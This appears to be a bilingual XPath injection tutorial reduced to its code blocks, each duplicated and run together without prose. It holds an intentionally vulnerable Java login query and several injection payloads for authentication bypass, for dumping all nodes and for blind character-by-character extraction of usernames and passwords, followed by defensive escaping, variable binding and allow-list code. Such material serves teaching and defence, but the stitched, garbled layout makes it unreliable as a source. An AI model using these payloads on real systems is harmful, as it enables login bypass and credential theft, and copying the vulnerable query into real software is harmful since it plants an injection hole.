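// VULNERABLE (kept for illustration): username and password are spliced into the
// query text, so a quote in either value becomes part of the predicate itself.
// NOTE(review): `xpath` is presumably the javax.xml.xpath.XPath instance; the
// original reused that name for the String and so called compile() on a String.
String query = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(query);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);
// VULNERABLE (kept for illustration): username and password are spliced into the
// query text, so a quote in either value becomes part of the predicate itself.
// NOTE(review): `xpath` is presumably the javax.xml.xpath.XPath instance; the
// original reused that name for the String and so called compile() on a String.
String query = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(query);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);
//user[username='admin']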
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']text()count()substring()string-length()contains()text()count()substring()string-length()contains()' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1' or '1'='1
' and '1'='2
' or 1=1 or '' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1' or '1'='1
' and '1'='2
' or 1=1 or '用户名: admin' or '1'='1
密码: anything
查询: //user[username='admin' or '1'='1' and password='anything']用户名: admin') or ('1'='1
查询: //user[username='admin') or ('1'='1' and password='*']Username: admin' or '1'='1
Password: anything
Query: //user[username='admin' or '1'='1' and password='anything']Username: admin') or ('1'='1
Query: //user[username='admin') or ('1'='1' and password='*']' or 1=1 or '
' or '1'='1
') or 1=1 or ('' or count(//user)>0 or '' or substring(//user[1]/username,1,1)='a' or '' or 1=1 or '
' or '1'='1
') or 1=1 or ('' or count(//user)>0 or '' or substring(//user[1]/username,1,1)='a' or '输入: admin' or '1'='1
查询: //user[username='admin' or '1'='1' and password='*']
结果: 匹配所有用户输入: admin')] | //* | //*[('
查询: //user[username='admin')] | //* | //*[('' and password='*']' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or 'Input: admin' or '1'='1
Query: //user[username='admin' or '1'='1' and password='*']
Result: Matches all usersInput: admin')] | //* | //*[('
Query: //user[username='admin')] | //* | //*[('' and password='*']' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or '' or 1=1 or '
结果: 返回所有用户节点' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
逐步获取每个字符' or substring(//user[1]/password,1,1)='p' or '
逐步获取密码字符' or 1=1 or '
Result: Returns all user nodes' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
Retrieve each character step by step' or substring(//user[1]/password,1,1)='p' or '
Retrieve password characters step by step' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '' or substring(//user[1]/username,1,1)='a' or '
观察响应差异' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '' or substring(//user[1]/username,1,1)='a' or '
Observe response differences' or '1'='1 → %27%20or%20%271%27%3D%271' → '
" → "
< → <
> → >' or '1'='1 → %27%20or%20%271%27%3D%271' → '
" → "
< → <
> → >' or 1=1 or '
' or '1'='1' or '' or 1=1 or '
' or '1'='1' or 'substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]from lxml import etree
from lxml.etree import XPathfrom lxml import etree
from lxml.etree import XPathundefinedundefinedprivate static final String[] XPATH_ESCAPE_CHARS =
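{"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};

/**
 * Prefixes every character listed in {@link #XPATH_ESCAPE_CHARS} with a backslash.
 *
 * @param input the raw value; may be {@code null}
 * @return the value with a backslash inserted before each listed character, or
 *     {@code null} when {@code input} is {@code null}
 * @deprecated XPath 1.0 string literals have no escape syntax, so the backslash
 *     inserted here is ordinary data and does not stop a quote from ending the
 *     literal; the result is not safe to concatenate into a query. Bind
 *     untrusted values through {@code XPathVariableResolver} instead.
 */
@Deprecated
public static String escapeXPath(String input) {
    if (input == null) {
        return null;
    }
    // Every entry is a single character, so one joined lookup string replaces the
    // Arrays.asList wrapper and String.valueOf allocation the original did per char.
    String escapable = String.join("", XPATH_ESCAPE_CHARS);
    StringBuilder out = new StringBuilder(input.length());
    for (int i = 0; i < input.length(); i++) {
        char c = input.charAt(i);
        if (escapable.indexOf(c) >= 0) {
            out.append('\\');
        }
        out.append(c);
    }
    return out.toString();
}
// Use XPath variables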
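// NOTE(review): `xpath` is presumably the javax.xml.xpath.XPath instance; the
// original reused that name for the String and so called compile() on a String.
String query = "//user[username=$username and password=$password]";
// The resolver belongs on the XPath object, not on the compiled expression
// (XPathExpression has no setXPathVariableResolver), and it has to be installed
// before compile(): the JDK implementation captures it at compile time.
XPathVariableResolver resolver = new MapVariableResolver(
    Map.of("username", escapedUsername, "password", escapedPassword));
xpath.setXPathVariableResolver(resolver);
XPathExpression expr = xpath.compile(query);
// NOTE(review): with variables the engine never parses the bound value, so escaping
// is unnecessary — escapeXPath output carries literal backslashes that would not
// match stored data; confirm the raw user values are what gets bound here.
// Only allow specific characters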
// Allow-list check: the value must consist only of letters, digits and @ . _ -
// so nothing that can alter query structure ever reaches the XPath text.
boolean wellFormed = input.matches("^[a-zA-Z0-9@._-]+$");
if (!wellFormed) {
    throw new IllegalArgumentException("Invalid input");
}
// Predefined query template
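/**
 * Login lookup with both values supplied as XPath variables rather than text.
 * XPath variable names are QNames and cannot start with a digit, so the original
 * {@code $1}/{@code $2} would not compile; the names now match the keys bound
 * through the variable resolver.
 */
private static final String LOGIN_QUERY =
    "//user[username=$username and password=$password]";
// Use parameter binding
private static final String[] XPATH_ESCAPE_CHARS =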
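{"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};

/**
 * Prefixes every character listed in {@link #XPATH_ESCAPE_CHARS} with a backslash.
 *
 * @param input the raw value; may be {@code null}
 * @return the value with a backslash inserted before each listed character, or
 *     {@code null} when {@code input} is {@code null}
 * @deprecated XPath 1.0 string literals have no escape syntax, so the backslash
 *     inserted here is ordinary data and does not stop a quote from ending the
 *     literal; the result is not safe to concatenate into a query. Bind
 *     untrusted values through {@code XPathVariableResolver} instead.
 */
@Deprecated
public static String escapeXPath(String input) {
    if (input == null) {
        return null;
    }
    // Every entry is a single character, so one joined lookup string replaces the
    // Arrays.asList wrapper and String.valueOf allocation the original did per char.
    String escapable = String.join("", XPATH_ESCAPE_CHARS);
    StringBuilder out = new StringBuilder(input.length());
    for (int i = 0; i < input.length(); i++) {
        char c = input.charAt(i);
        if (escapable.indexOf(c) >= 0) {
            out.append('\\');
        }
        out.append(c);
    }
    return out.toString();
}
// Use XPath variables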
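// NOTE(review): `xpath` is presumably the javax.xml.xpath.XPath instance; the
// original reused that name for the String and so called compile() on a String.
String query = "//user[username=$username and password=$password]";
// The resolver belongs on the XPath object, not on the compiled expression
// (XPathExpression has no setXPathVariableResolver), and it has to be installed
// before compile(): the JDK implementation captures it at compile time.
XPathVariableResolver resolver = new MapVariableResolver(
    Map.of("username", escapedUsername, "password", escapedPassword));
xpath.setXPathVariableResolver(resolver);
XPathExpression expr = xpath.compile(query);
// NOTE(review): with variables the engine never parses the bound value, so escaping
// is unnecessary — escapeXPath output carries literal backslashes that would not
// match stored data; confirm the raw user values are what gets bound here.
// Only allow specific characters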
// Allow-list check: the value must consist only of letters, digits and @ . _ -
// so nothing that can alter query structure ever reaches the XPath text.
boolean wellFormed = input.matches("^[a-zA-Z0-9@._-]+$");
if (!wellFormed) {
    throw new IllegalArgumentException("Invalid input");
}
// Predefined query template
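/**
 * Login lookup with both values supplied as XPath variables rather than text.
 * XPath variable names are QNames and cannot start with a digit, so the original
 * {@code $1}/{@code $2} would not compile; the names now match the keys bound
 * through the variable resolver.
 */
private static final String LOGIN_QUERY =
    "//user[username=$username and password=$password]";
// Use parameter binding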